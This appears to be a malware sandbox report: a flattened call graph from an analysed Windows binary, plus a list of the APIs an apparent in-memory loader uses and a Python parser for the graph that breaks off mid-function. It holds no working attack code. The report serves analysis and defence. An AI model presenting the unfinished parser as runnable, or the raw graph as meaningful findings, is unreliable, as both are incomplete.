Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 9.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 37
86328->86329 86330 401fb4 86329->86330 86331 401980 53 API calls 86330->86331 86332 401fc3 86331->86332 86333 401b10 52 API calls 86332->86333 86334 401fd2 86333->86334 86538 40c2c0 86334->86538 86336 401fe1 86337 40bc70 52 API calls 86336->86337 86338 401ff3 86337->86338 86556 401a10 86338->86556 86340 401ffe 86563 4114ab 86340->86563 86343 428b05 86345 401a10 52 API calls 86343->86345 86344 402017 86346 4114ab __wcsicoll 58 API calls 86344->86346 86347 428b18 86345->86347 86348 402022 86346->86348 86350 401a10 52 API calls 86347->86350 86348->86347 86349 40202d 86348->86349 86351 4114ab __wcsicoll 58 API calls 86349->86351 86352 428b33 86350->86352 86353 402038 86351->86353 86355 428b3b GetModuleFileNameW 86352->86355 86354 402043 86353->86354 86353->86355 86356 4114ab __wcsicoll 58 API calls 86354->86356 86357 401a10 52 API calls 86355->86357 86358 40204e 86356->86358 86359 428b6c 86357->86359 86360 402092 86358->86360 86364 401a10 52 API calls 86358->86364 86369 428b90 _wcscpy 86358->86369 86575 40e0a0 52 API calls 86359->86575 86363 4020a3 86360->86363 86360->86369 86362 428b7a 86365 401a10 52 API calls 86362->86365 86366 428bc6 86363->86366 86571 40e830 53 API calls 86363->86571 86367 402073 _wcscpy 86364->86367 86368 428b88 86365->86368 86375 401a10 52 API calls 86367->86375 86368->86369 86372 401a10 52 API calls 86369->86372 86371 4020bb 86572 40cf00 53 API calls 86371->86572 86379 4020d0 86372->86379 86374 4020c6 86376 408f40 VariantClear 86374->86376 86375->86360 86376->86379 86377 402110 86381 408f40 VariantClear 86377->86381 86379->86377 86382 401a10 52 API calls 86379->86382 86573 40cf00 53 API calls 86379->86573 86574 40e6a0 53 API calls 86379->86574 86383 402120 moneypunct 86381->86383 86382->86379 86383->86228 86385 4295c9 setSBCS 86384->86385 86386 40f53c 86384->86386 86388 4295d9 GetOpenFileNameW 86385->86388 87276 410120 86386->87276 86388->86386 86390 40d5f5 86388->86390 86389 40f545 87280 4102b0 SHGetMalloc 86389->87280 86390->86236 
86390->86238 86392 40f54c 87285 410190 GetFullPathNameW 86392->87285 86394 40f559 87296 40f570 86394->87296 87358 402400 86396->87358 86398 40146f 86401 428c29 _wcscat 86398->86401 87367 401500 86398->87367 86400 40147c 86400->86401 87375 40d440 86400->87375 86403 401489 86403->86401 86404 401491 GetFullPathNameW 86403->86404 86405 402160 52 API calls 86404->86405 86406 4014bb 86405->86406 86407 402160 52 API calls 86406->86407 86408 4014c8 86407->86408 86408->86401 86409 402160 52 API calls 86408->86409 86410 4014ee 86409->86410 86410->86238 86412 428361 86411->86412 86413 4103fc LoadImageW RegisterClassExW 86411->86413 87447 44395e EnumResourceNamesW LoadImageW 86412->87447 87446 410490 7 API calls 86413->87446 86416 40d651 86418 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86416->86418 86417 428368 86418->86250 86420 409202 86419->86420 86421 42d7ad 86419->86421 86476 409216 moneypunct 86420->86476 87719 410940 336 API calls 86420->87719 87722 45e737 90 API calls 3 library calls 86421->87722 86424 40939c 86424->86252 86486 401000 Shell_NotifyIconW setSBCS 86424->86486 86426 4095b2 86426->86424 86428 4095bf 86426->86428 86427 409253 PeekMessageW 86427->86476 87721 401a50 336 API calls 86428->87721 86429 40d410 VariantClear 86429->86476 86431 42d8cd Sleep 86431->86476 86432 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86432->86424 86435 4095f9 86432->86435 86434 42e13b 87741 40d410 VariantClear 86434->87741 86438 42e158 TranslateMessage DispatchMessageW GetMessageW 86435->86438 86438->86438 86440 42e188 86438->86440 86439 409386 86439->86424 87720 40f190 10 API calls 86439->87720 86440->86424 86442 409567 PeekMessageW 86442->86476 86444 44c29d 52 API calls 86484 4094e0 86444->86484 86445 46f3c1 107 API calls 86445->86476 86447 46fdbf 108 API calls 86447->86484 86448 409551 TranslateMessage DispatchMessageW 86448->86442 86450 42dcd2 WaitForSingleObject 86452 42dcf0 GetExitCodeProcess CloseHandle 86450->86452 86450->86476 86451 42dd3d Sleep 
86451->86484 87730 40d410 VariantClear 86452->87730 86456 4094cf Sleep 86456->86484 86458 42d94d timeGetTime 87726 465124 53 API calls 86458->87726 86460 40c620 timeGetTime 86460->86484 86463 465124 53 API calls 86463->86484 86464 42dd89 CloseHandle 86464->86484 86465 47d33e 314 API calls 86465->86476 86467 42de19 GetExitCodeProcess CloseHandle 86467->86484 86468 408f40 VariantClear 86468->86484 86471 42de88 Sleep 86471->86476 86476->86427 86476->86429 86476->86431 86476->86434 86476->86439 86476->86442 86476->86445 86476->86448 86476->86450 86476->86451 86476->86456 86476->86458 86476->86465 86477 42e0cc VariantClear 86476->86477 86478 408f40 VariantClear 86476->86478 86479 45e737 90 API calls 86476->86479 86476->86484 87448 4091b0 86476->87448 87506 40afa0 86476->87506 87532 4096a0 86476->87532 87659 408fc0 86476->87659 87694 408cc0 86476->87694 87708 40d150 86476->87708 87713 40d170 86476->87713 87723 465124 53 API calls 86476->87723 87724 40e0a0 52 API calls 86476->87724 87725 40c620 timeGetTime 86476->87725 87740 40e270 VariantClear moneypunct 86476->87740 86477->86476 86478->86476 86479->86476 86481 401b10 52 API calls 86481->86484 86482 401980 53 API calls 86482->86484 86484->86444 86484->86447 86484->86460 86484->86463 86484->86464 86484->86467 86484->86468 86484->86471 86484->86476 86484->86481 86484->86482 87727 45178a 54 API calls 86484->87727 87728 47d33e 336 API calls 86484->87728 87729 453bc6 54 API calls 86484->87729 87731 40d410 VariantClear 86484->87731 87732 443d19 67 API calls _wcslen 86484->87732 87733 4574b4 VariantClear 86484->87733 87734 403cd0 86484->87734 87738 4731e1 VariantClear 86484->87738 87739 4331a2 6 API calls 86484->87739 86485->86251 86486->86252 86487->86238 86488->86244 86490 401b16 _wcslen 86489->86490 86491 4115d7 52 API calls 86490->86491 86493 401b63 86490->86493 86492 401b4b _memmove 86491->86492 86494 4115d7 52 API calls 86492->86494 86495 40d200 52 API calls 2 library calls 86493->86495 86494->86493 86495->86260 
86496->86263 86498 40bc70 52 API calls 86497->86498 86499 401f31 86498->86499 86500 402560 86499->86500 86501 40256d __write_nolock 86500->86501 86502 402160 52 API calls 86501->86502 86504 402593 86502->86504 86514 4025bd 86504->86514 86576 401c90 86504->86576 86505 4026f0 52 API calls 86505->86514 86506 4026a7 86507 401b10 52 API calls 86506->86507 86513 4026db 86506->86513 86509 4026d1 86507->86509 86508 401b10 52 API calls 86508->86514 86580 40d7c0 52 API calls 2 library calls 86509->86580 86510 401c90 52 API calls 86510->86514 86513->86318 86514->86505 86514->86506 86514->86508 86514->86510 86579 40d7c0 52 API calls 2 library calls 86514->86579 86581 40f760 86515->86581 86518 410118 86518->86320 86520 42805d 86521 42806a 86520->86521 86637 431e58 86520->86637 86523 413748 _free 46 API calls 86521->86523 86524 428078 86523->86524 86525 431e58 82 API calls 86524->86525 86526 428084 86525->86526 86526->86320 86528 4115d7 52 API calls 86527->86528 86529 401f74 86528->86529 86529->86323 86531 4019a3 86530->86531 86532 401985 86530->86532 86531->86532 86533 4019b8 86531->86533 86535 40199f 86532->86535 87242 403e10 86532->87242 86534 403e10 53 API calls 86533->86534 86537 4019c4 86534->86537 86535->86326 86537->86326 86539 40c2c7 86538->86539 86540 40c30e 86538->86540 86541 40c2d3 86539->86541 86542 426c79 86539->86542 86543 40c315 86540->86543 86544 426c2b 86540->86544 87266 403ea0 52 API calls __cinit 86541->87266 87271 4534e3 52 API calls 86542->87271 86547 40c321 86543->86547 86551 426c5a 86543->86551 86546 426c4b 86544->86546 86548 426c2e 86544->86548 87269 4534e3 52 API calls 86546->87269 87267 403ea0 52 API calls __cinit 86547->87267 86555 40c2de 86548->86555 87268 4534e3 52 API calls 86548->87268 87270 4534e3 52 API calls 86551->87270 86555->86336 86557 401a30 86556->86557 86558 401a17 86556->86558 86560 402160 52 API calls 86557->86560 86559 401a2d 86558->86559 87272 403c30 52 API calls _memmove 86558->87272 86559->86340 86562 401a3d 86560->86562 
86562->86340 86564 411523 86563->86564 86565 4114ba 86563->86565 87275 4113a8 58 API calls 3 library calls 86564->87275 86570 40200c 86565->86570 87273 417f77 46 API calls __getptd_noexit 86565->87273 86568 4114c6 87274 417f25 10 API calls __lseeki64 86568->87274 86570->86343 86570->86344 86571->86371 86572->86374 86573->86379 86574->86379 86575->86362 86577 4026f0 52 API calls 86576->86577 86578 401c97 86577->86578 86578->86504 86579->86514 86580->86513 86641 40f6f0 86581->86641 86583 40f77b _strcat moneypunct 86649 40f850 86583->86649 86585 40f7ab 86585->86585 86653 4149c2 86585->86653 86588 427c2a 86678 414d04 86588->86678 86590 40f7fc 86590->86588 86591 40f804 86590->86591 86665 414a46 86591->86665 86595 40f80e 86595->86518 86600 4528bd 86595->86600 86597 427c59 86684 414fe2 86597->86684 86599 427c79 86601 4150d1 _fseek 81 API calls 86600->86601 86602 452930 86601->86602 87184 452719 86602->87184 86605 452948 86605->86520 86606 414d04 __fread_nolock 61 API calls 86607 452966 86606->86607 86608 414d04 __fread_nolock 61 API calls 86607->86608 86609 452976 86608->86609 86610 414d04 __fread_nolock 61 API calls 86609->86610 86611 45298f 86610->86611 86612 414d04 __fread_nolock 61 API calls 86611->86612 86613 4529aa 86612->86613 86614 4150d1 _fseek 81 API calls 86613->86614 86615 4529c4 86614->86615 86616 4135bb _malloc 46 API calls 86615->86616 86617 4529cf 86616->86617 86618 4135bb _malloc 46 API calls 86617->86618 86619 4529db 86618->86619 86620 414d04 __fread_nolock 61 API calls 86619->86620 86621 4529ec 86620->86621 86622 44afef GetSystemTimeAsFileTime 86621->86622 86623 452a00 86622->86623 86624 452a36 86623->86624 86625 452a13 86623->86625 86626 452aa5 86624->86626 86627 452a3c 86624->86627 86628 413748 _free 46 API calls 86625->86628 86630 413748 _free 46 API calls 86626->86630 87190 44b1a9 86627->87190 86631 452a1c 86628->86631 86633 452aa3 86630->86633 86634 413748 _free 46 API calls 86631->86634 86632 452a9d 86635 413748 _free 46 API calls 86632->86635 
86633->86520 86636 452a25 86634->86636 86635->86633 86636->86520 86638 431e64 86637->86638 86639 431e6a 86637->86639 86640 414a46 __fcloseall 82 API calls 86638->86640 86639->86521 86640->86639 86642 425de2 86641->86642 86644 40f6fc _wcslen 86641->86644 86642->86583 86643 40f710 WideCharToMultiByte 86645 40f756 86643->86645 86646 40f728 86643->86646 86644->86643 86645->86583 86647 4115d7 52 API calls 86646->86647 86648 40f735 WideCharToMultiByte 86647->86648 86648->86583 86651 40f85d setSBCS _strlen 86649->86651 86652 40f9c6 86651->86652 86697 414db8 86651->86697 86652->86585 86712 414904 86653->86712 86655 40f7e9 86655->86588 86656 40f5c0 86655->86656 86657 40f5cd _strcat __write_nolock _memmove 86656->86657 86658 414d04 __fread_nolock 61 API calls 86657->86658 86660 425d11 86657->86660 86664 40f691 __tzset_nolock 86657->86664 86800 4150d1 86657->86800 86658->86657 86661 4150d1 _fseek 81 API calls 86660->86661 86662 425d33 86661->86662 86663 414d04 __fread_nolock 61 API calls 86662->86663 86663->86664 86664->86590 86666 414a52 __tzset_nolock 86665->86666 86667 414a64 86666->86667 86668 414a79 86666->86668 86940 417f77 46 API calls __getptd_noexit 86667->86940 86670 415471 __lock_file 47 API calls 86668->86670 86673 414a74 __tzset_nolock 86668->86673 86674 414a92 86670->86674 86671 414a69 86941 417f25 10 API calls __lseeki64 86671->86941 86673->86595 86924 4149d9 86674->86924 87009 414c76 86678->87009 86680 414d1c 86681 44afef 86680->86681 87177 442c5a 86681->87177 86683 44b00d 86683->86597 86685 414fee __tzset_nolock 86684->86685 86686 414ffa 86685->86686 86687 41500f 86685->86687 87181 417f77 46 API calls __getptd_noexit 86686->87181 86689 415471 __lock_file 47 API calls 86687->86689 86691 415017 86689->86691 86690 414fff 87182 417f25 10 API calls __lseeki64 86690->87182 86693 414e4e __ftell_nolock 51 API calls 86691->86693 86694 415024 86693->86694 87183 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 86694->87183 86696 41500a __tzset_nolock 
86696->86599 86698 414dd6 86697->86698 86699 414deb 86697->86699 86708 417f77 46 API calls __getptd_noexit 86698->86708 86699->86698 86701 414df2 86699->86701 86710 41b91b 79 API calls 12 library calls 86701->86710 86702 414ddb 86709 417f25 10 API calls __lseeki64 86702->86709 86705 414e18 86706 414de6 86705->86706 86711 418f98 77 API calls 4 library calls 86705->86711 86706->86651 86708->86702 86709->86706 86710->86705 86711->86706 86715 414910 __tzset_nolock 86712->86715 86713 414923 86768 417f77 46 API calls __getptd_noexit 86713->86768 86715->86713 86717 414951 86715->86717 86716 414928 86769 417f25 10 API calls __lseeki64 86716->86769 86731 41d4d1 86717->86731 86720 414956 86721 41496a 86720->86721 86722 41495d 86720->86722 86724 414992 86721->86724 86725 414972 86721->86725 86770 417f77 46 API calls __getptd_noexit 86722->86770 86748 41d218 86724->86748 86771 417f77 46 API calls __getptd_noexit 86725->86771 86727 414933 __tzset_nolock @_EH4_CallFilterFunc@8 86727->86655 86732 41d4dd __tzset_nolock 86731->86732 86733 4182cb __lock 46 API calls 86732->86733 86739 41d4eb 86733->86739 86734 41d567 86736 416b04 __malloc_crt 46 API calls 86734->86736 86738 41d56e 86736->86738 86737 41d5f0 __tzset_nolock 86737->86720 86740 41d57c InitializeCriticalSectionAndSpinCount 86738->86740 86746 41d560 86738->86746 86739->86734 86743 418209 __mtinitlocknum 46 API calls 86739->86743 86739->86746 86776 4154b2 47 API calls __lock 86739->86776 86777 415520 LeaveCriticalSection LeaveCriticalSection _doexit 86739->86777 86741 41d59c 86740->86741 86742 41d5af EnterCriticalSection 86740->86742 86745 413748 _free 46 API calls 86741->86745 86742->86746 86743->86739 86745->86746 86773 41d5fb 86746->86773 86750 41d23a 86748->86750 86749 41d26c __wopenfile 86755 41d47a 86749->86755 86767 41d421 86749->86767 86784 41341f 58 API calls 2 library calls 86749->86784 86750->86749 86751 41d255 86750->86751 86782 417f77 46 API calls __getptd_noexit 86751->86782 86753 41d25a 86783 417f25 10 API 
calls __lseeki64 86753->86783 86787 417f77 46 API calls __getptd_noexit 86755->86787 86756 41d48c 86779 422bf9 86756->86779 86758 41499d 86772 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 86758->86772 86760 41d47f 86788 417f25 10 API calls __lseeki64 86760->86788 86763 41d41a 86763->86767 86785 41341f 58 API calls 2 library calls 86763->86785 86765 41d439 86765->86767 86786 41341f 58 API calls 2 library calls 86765->86786 86767->86755 86767->86756 86768->86716 86769->86727 86770->86727 86771->86727 86772->86727 86778 4181f2 LeaveCriticalSection 86773->86778 86775 41d602 86775->86737 86776->86739 86777->86739 86778->86775 86789 422b35 86779->86789 86781 422c14 86781->86758 86782->86753 86783->86758 86784->86763 86785->86765 86786->86767 86787->86760 86788->86758 86790 422b41 __tzset_nolock 86789->86790 86791 422b54 86790->86791 86793 422b8a 86790->86793 86792 417f77 __lseeki64 46 API calls 86791->86792 86794 422b59 86792->86794 86795 422400 __tsopen_nolock 109 API calls 86793->86795 86796 417f25 __lseeki64 10 API calls 86794->86796 86797 422ba4 86795->86797 86799 422b63 __tzset_nolock 86796->86799 86798 422bcb __wsopen_helper LeaveCriticalSection 86797->86798 86798->86799 86799->86781 86803 4150dd __tzset_nolock 86800->86803 86801 4150e9 86831 417f77 46 API calls __getptd_noexit 86801->86831 86803->86801 86804 41510f 86803->86804 86813 415471 86804->86813 86805 4150ee 86832 417f25 10 API calls __lseeki64 86805->86832 86812 4150f9 __tzset_nolock 86812->86657 86814 415483 86813->86814 86815 4154a5 EnterCriticalSection 86813->86815 86814->86815 86817 41548b 86814->86817 86816 415117 86815->86816 86819 415047 86816->86819 86818 4182cb __lock 46 API calls 86817->86818 86818->86816 86820 415067 86819->86820 86821 415057 86819->86821 86826 415079 86820->86826 86834 414e4e 86820->86834 86889 417f77 46 API calls __getptd_noexit 86821->86889 86825 41505c 86833 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 86825->86833 86851 41443c 86826->86851 86829 
4150b9 86864 41e1f4 86829->86864 86831->86805 86832->86812 86833->86812 86835 414e61 86834->86835 86836 414e79 86834->86836 86890 417f77 46 API calls __getptd_noexit 86835->86890 86837 414139 __stbuf 46 API calls 86836->86837 86841 414e80 86837->86841 86839 414e66 86891 417f25 10 API calls __lseeki64 86839->86891 86842 41e1f4 __write 51 API calls 86841->86842 86843 414e97 86842->86843 86844 414f09 86843->86844 86846 414ec9 86843->86846 86850 414e71 86843->86850 86892 417f77 46 API calls __getptd_noexit 86844->86892 86847 41e1f4 __write 51 API calls 86846->86847 86846->86850 86848 414f64 86847->86848 86849 41e1f4 __write 51 API calls 86848->86849 86848->86850 86849->86850 86850->86826 86852 414477 86851->86852 86853 414455 86851->86853 86857 414139 86852->86857 86853->86852 86854 414139 __stbuf 46 API calls 86853->86854 86855 414470 86854->86855 86893 41b7b2 77 API calls 5 library calls 86855->86893 86858 414145 86857->86858 86859 41415a 86857->86859 86894 417f77 46 API calls __getptd_noexit 86858->86894 86859->86829 86861 41414a 86895 417f25 10 API calls __lseeki64 86861->86895 86863 414155 86863->86829 86865 41e200 __tzset_nolock 86864->86865 86866 41e223 86865->86866 86867 41e208 86865->86867 86869 41e22f 86866->86869 86872 41e269 86866->86872 86916 417f8a 46 API calls __getptd_noexit 86867->86916 86918 417f8a 46 API calls __getptd_noexit 86869->86918 86870 41e20d 86917 417f77 46 API calls __getptd_noexit 86870->86917 86896 41ae56 86872->86896 86874 41e234 86919 417f77 46 API calls __getptd_noexit 86874->86919 86876 41e215 __tzset_nolock 86876->86825 86878 41e23c 86920 417f25 10 API calls __lseeki64 86878->86920 86879 41e26f 86881 41e291 86879->86881 86882 41e27d 86879->86882 86921 417f77 46 API calls __getptd_noexit 86881->86921 86906 41e17f 86882->86906 86885 41e289 86923 41e2c0 LeaveCriticalSection __unlock_fhandle 86885->86923 86886 41e296 86922 417f8a 46 API calls __getptd_noexit 86886->86922 86889->86825 86890->86839 86891->86850 86892->86850 86893->86852 
86894->86861 86895->86863 86897 41ae62 __tzset_nolock 86896->86897 86898 41aebc 86897->86898 86899 4182cb __lock 46 API calls 86897->86899 86900 41aec1 EnterCriticalSection 86898->86900 86901 41aede __tzset_nolock 86898->86901 86902 41ae8e 86899->86902 86900->86901 86901->86879 86903 41ae97 InitializeCriticalSectionAndSpinCount 86902->86903 86904 41aeaa 86902->86904 86903->86904 86905 41aeec ___lock_fhandle LeaveCriticalSection 86904->86905 86905->86898 86907 41aded __close_nolock 46 API calls 86906->86907 86908 41e18e 86907->86908 86909 41e1a4 SetFilePointer 86908->86909 86910 41e194 86908->86910 86912 41e1c3 86909->86912 86913 41e1bb GetLastError 86909->86913 86911 417f77 __lseeki64 46 API calls 86910->86911 86914 41e199 86911->86914 86912->86914 86915 417f9d __dosmaperr 46 API calls 86912->86915 86913->86912 86914->86885 86915->86914 86916->86870 86917->86876 86918->86874 86919->86878 86920->86876 86921->86886 86922->86885 86923->86876 86925 4149ea 86924->86925 86926 4149fe 86924->86926 86970 417f77 46 API calls __getptd_noexit 86925->86970 86927 4149fa 86926->86927 86929 41443c __flush 77 API calls 86926->86929 86942 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 86927->86942 86931 414a0a 86929->86931 86930 4149ef 86971 417f25 10 API calls __lseeki64 86930->86971 86943 41d8c2 86931->86943 86935 414139 __stbuf 46 API calls 86936 414a18 86935->86936 86947 41d7fe 86936->86947 86938 414a1e 86938->86927 86939 413748 _free 46 API calls 86938->86939 86939->86927 86940->86671 86941->86673 86942->86673 86944 414a12 86943->86944 86945 41d8d2 86943->86945 86944->86935 86945->86944 86946 413748 _free 46 API calls 86945->86946 86946->86944 86948 41d80a __tzset_nolock 86947->86948 86949 41d812 86948->86949 86950 41d82d 86948->86950 86987 417f8a 46 API calls __getptd_noexit 86949->86987 86951 41d839 86950->86951 86956 41d873 86950->86956 86989 417f8a 46 API calls __getptd_noexit 86951->86989 86954 41d817 86988 417f77 46 API calls __getptd_noexit 86954->86988 86955 
41d83e 86990 417f77 46 API calls __getptd_noexit 86955->86990 86959 41ae56 ___lock_fhandle 48 API calls 86956->86959 86961 41d879 86959->86961 86960 41d846 86991 417f25 10 API calls __lseeki64 86960->86991 86963 41d893 86961->86963 86964 41d887 86961->86964 86992 417f77 46 API calls __getptd_noexit 86963->86992 86972 41d762 86964->86972 86967 41d88d 86993 41d8ba LeaveCriticalSection __unlock_fhandle 86967->86993 86968 41d81f __tzset_nolock 86968->86938 86970->86930 86971->86927 86994 41aded 86972->86994 86974 41d7c8 87007 41ad67 47 API calls __lseeki64 86974->87007 86976 41d772 86976->86974 86979 41aded __close_nolock 46 API calls 86976->86979 86986 41d7a6 86976->86986 86977 41aded __close_nolock 46 API calls 86980 41d7b2 CloseHandle 86977->86980 86978 41d7d0 86984 41d7f2 86978->86984 87008 417f9d 46 API calls 2 library calls 86978->87008 86981 41d79d 86979->86981 86980->86974 86982 41d7be GetLastError 86980->86982 86985 41aded __close_nolock 46 API calls 86981->86985 86982->86974 86984->86967 86985->86986 86986->86974 86986->86977 86987->86954 86988->86968 86989->86955 86990->86960 86991->86968 86992->86967 86993->86968 86995 41ae12 86994->86995 86996 41adfa 86994->86996 86998 417f8a __lseeki64 46 API calls 86995->86998 87001 41ae51 86995->87001 86997 417f8a __lseeki64 46 API calls 86996->86997 86999 41adff 86997->86999 87000 41ae23 86998->87000 87002 417f77 __lseeki64 46 API calls 86999->87002 87003 417f77 __lseeki64 46 API calls 87000->87003 87001->86976 87004 41ae07 87002->87004 87005 41ae2b 87003->87005 87004->86976 87006 417f25 __lseeki64 10 API calls 87005->87006 87006->87004 87007->86978 87008->86984 87010 414c82 __tzset_nolock 87009->87010 87011 414cc3 87010->87011 87012 414c96 setSBCS 87010->87012 87021 414cbb __tzset_nolock 87010->87021 87013 415471 __lock_file 47 API calls 87011->87013 87036 417f77 46 API calls __getptd_noexit 87012->87036 87014 414ccb 87013->87014 87022 414aba 87014->87022 87016 414cb0 87037 417f25 10 API calls __lseeki64 87016->87037 
87021->86680 87023 414af2 87022->87023 87026 414ad8 setSBCS 87022->87026 87038 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87023->87038 87024 414ae2 87089 417f77 46 API calls __getptd_noexit 87024->87089 87026->87023 87026->87024 87029 414b2d 87026->87029 87029->87023 87030 414c38 setSBCS 87029->87030 87031 414139 __stbuf 46 API calls 87029->87031 87039 41dfcc 87029->87039 87069 41d8f3 87029->87069 87091 41e0c2 46 API calls 3 library calls 87029->87091 87092 417f77 46 API calls __getptd_noexit 87030->87092 87031->87029 87035 414ae7 87090 417f25 10 API calls __lseeki64 87035->87090 87036->87016 87037->87021 87038->87021 87040 41dfd8 __tzset_nolock 87039->87040 87041 41dfe0 87040->87041 87042 41dffb 87040->87042 87162 417f8a 46 API calls __getptd_noexit 87041->87162 87043 41e007 87042->87043 87048 41e041 87042->87048 87164 417f8a 46 API calls __getptd_noexit 87043->87164 87046 41dfe5 87163 417f77 46 API calls __getptd_noexit 87046->87163 87047 41e00c 87165 417f77 46 API calls __getptd_noexit 87047->87165 87051 41e063 87048->87051 87052 41e04e 87048->87052 87053 41ae56 ___lock_fhandle 48 API calls 87051->87053 87167 417f8a 46 API calls __getptd_noexit 87052->87167 87056 41e069 87053->87056 87054 41e014 87166 417f25 10 API calls __lseeki64 87054->87166 87058 41e077 87056->87058 87059 41e08b 87056->87059 87057 41e053 87168 417f77 46 API calls __getptd_noexit 87057->87168 87093 41da15 87058->87093 87169 417f77 46 API calls __getptd_noexit 87059->87169 87062 41dfed __tzset_nolock 87062->87029 87065 41e083 87171 41e0ba LeaveCriticalSection __unlock_fhandle 87065->87171 87066 41e090 87170 417f8a 46 API calls __getptd_noexit 87066->87170 87070 41d900 87069->87070 87074 41d915 87069->87074 87175 417f77 46 API calls __getptd_noexit 87070->87175 87072 41d905 87176 417f25 10 API calls __lseeki64 87072->87176 87075 41d94a 87074->87075 87080 41d910 87074->87080 87172 420603 87074->87172 87077 414139 __stbuf 46 API calls 87075->87077 87078 41d95e 87077->87078 87079 
41dfcc __read 59 API calls 87078->87079 87081 41d965 87079->87081 87080->87029 87081->87080 87082 414139 __stbuf 46 API calls 87081->87082 87083 41d988 87082->87083 87083->87080 87084 414139 __stbuf 46 API calls 87083->87084 87085 41d994 87084->87085 87085->87080 87086 414139 __stbuf 46 API calls 87085->87086 87087 41d9a1 87086->87087 87088 414139 __stbuf 46 API calls 87087->87088 87088->87080 87089->87035 87090->87023 87091->87029 87092->87035 87094 41da31 87093->87094 87095 41da4c 87093->87095 87096 417f8a __lseeki64 46 API calls 87094->87096 87097 41da5b 87095->87097 87099 41da7a 87095->87099 87098 41da36 87096->87098 87100 417f8a __lseeki64 46 API calls 87097->87100 87101 417f77 __lseeki64 46 API calls 87098->87101 87103 41da98 87099->87103 87115 41daac 87099->87115 87102 41da60 87100->87102 87116 41da3e 87101->87116 87105 417f77 __lseeki64 46 API calls 87102->87105 87106 417f8a __lseeki64 46 API calls 87103->87106 87104 41db02 87109 417f8a __lseeki64 46 API calls 87104->87109 87108 41da67 87105->87108 87107 41da9d 87106->87107 87110 417f77 __lseeki64 46 API calls 87107->87110 87111 417f25 __lseeki64 10 API calls 87108->87111 87112 41db07 87109->87112 87114 41daa4 87110->87114 87111->87116 87113 417f77 __lseeki64 46 API calls 87112->87113 87113->87114 87118 417f25 __lseeki64 10 API calls 87114->87118 87115->87104 87115->87116 87117 41dae1 87115->87117 87119 41db1b 87115->87119 87116->87065 87117->87104 87122 41daec ReadFile 87117->87122 87118->87116 87121 416b04 __malloc_crt 46 API calls 87119->87121 87123 41db31 87121->87123 87124 41dc17 87122->87124 87125 41df8f GetLastError 87122->87125 87128 41db59 87123->87128 87129 41db3b 87123->87129 87124->87125 87130 41dc2b 87124->87130 87126 41de16 87125->87126 87127 41df9c 87125->87127 87137 417f9d __dosmaperr 46 API calls 87126->87137 87141 41dd9b 87126->87141 87132 417f77 __lseeki64 46 API calls 87127->87132 87131 420494 __lseeki64_nolock 48 API calls 87128->87131 87133 417f77 __lseeki64 46 API calls 87129->87133 
[Control-flow graph residue from the Joe Sandbox IDA Plugin: the rendered graph belonging to the function whose APIs are listed below was extracted as a flat run of node ids (86xxx-88xxx), function addresses and "id->id" edges and cannot be reproduced here as text. The information that survives is the set of routines named on graph nodes.]

Main image (module at 00400000), Win32 calls on the graph: ReadFile, GetLastError, MultiByteToWideChar, GetSystemTimeAsFileTime, GetFullPathNameW, SHGetDesktopFolder, SHGetPathFromIDListW, CharUpperBuffW, VariantInit, VariantCopy, VariantClear, InterlockedIncrement, InterlockedDecrement, Sleep, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, FindFirstFileW, FindClose, GetFileAttributesW, CreateFileW, WriteFile, SetFilePointerEx, CloseHandle, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, GetCurrentProcess, LoadLibraryA, GetProcAddress, FreeLibrary, GetStdHandle, CreateThread, RegOpenKeyExW, RegQueryValueExW, RegCloseKey.

Main image, CRT internals on the graph: _malloc, _free, _memmove, _wcslen, _wcscpy, _wcsncpy, __wcsicoll, __wsplitpath, __lseeki64, __lseeki64_nolock, __fread_nolock, _fseek, __fcloseall, __tzset_nolock, __cinit, __aulldiv, __malloc_crt, _wprintf, moneypunct.

Second code region at 03EB2C48-03EB6192, outside the mapped 00400000 image: GetPEB, CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, VirtualFree, CloseHandle.
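The graph reached this page only as a flat run of node ids, addresses and "id->id" edges. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin, that turns that residue back into a navigable graph: it tokenises the dump, attaches the API names (and the "N API calls" counts) to their nodes, and walks the edges to list every API reachable from a chosen node. The token grammar it assumes (5-digit decimal node ids, 5-8 hex-digit addresses, free text after an address belonging to that node) is inferred from the dump and is not documented by Joe Sandbox; the sample string is an excerpt of the 03EB2C48-03EB6192 region copied from this page.

```python
import re
from collections import defaultdict

# Tokenizer for the IDA-plugin graph residue. Assumed grammar (inferred from the
# dump, not documented): "A->B" is a directed edge between two 5-digit node ids;
# "ID ADDR text..." is a node header with a 5-8 hex-digit address, and the text
# up to the next id (API names, "N API calls", "N library calls") is that node's.
_TOKEN = re.compile(
    r"(?<!\S)(?:"
    r"(?P<src>\d{5})->(?P<dst>\d{5})"                    # edge
    r"|(?P<id>\d{5})\s+(?P<addr>[0-9a-f]{5,8})\b(?!->)"  # node header
    r"(?P<rest>(?:\s+(?!\d{5}\b)\S+)*)"                  # names / call counts
    r")"
)
_CALLS = re.compile(r"\b(\d+)\s+(?:API|library)\s+calls\b")

# Constructed input: the 0x3eb region of this report's graph, copied verbatim.
SAMPLE = """88209 3eb5258 88210 3eb2c48 GetPEB 88209->88210 88213 3eb52f7
88210->88213 88212 3eb5328 CreateFileW 88212->88213 88219 3eb5335 88212->88219
88214 3eb5351 VirtualAlloc 88213->88214 88213->88219 88220 3eb5458 CloseHandle
88213->88220 88221 3eb5468 VirtualFree 88213->88221 88223 3eb6168 GetPEB
88213->88223 88215 3eb5372 ReadFile 88214->88215 88214->88219 88216 3eb5390
VirtualAlloc 88215->88216 88215->88219 88216->88213 88216->88219 88217 3eb5552
88217->88208 88218 3eb5544 VirtualFree 88218->88217 88219->88217 88219->88218
88220->88213 88221->88213 88222 3eb5ef8 9 API calls 88204->88222 88224 3eb6192
88223->88224 88224->88212"""


def parse_graph(text):
    """Return (nodes, edges).

    nodes: id -> {"addr": int, "apis": [names], "calls": summed call count}
    edges: src id -> set of dst ids
    """
    nodes, edges = {}, defaultdict(set)
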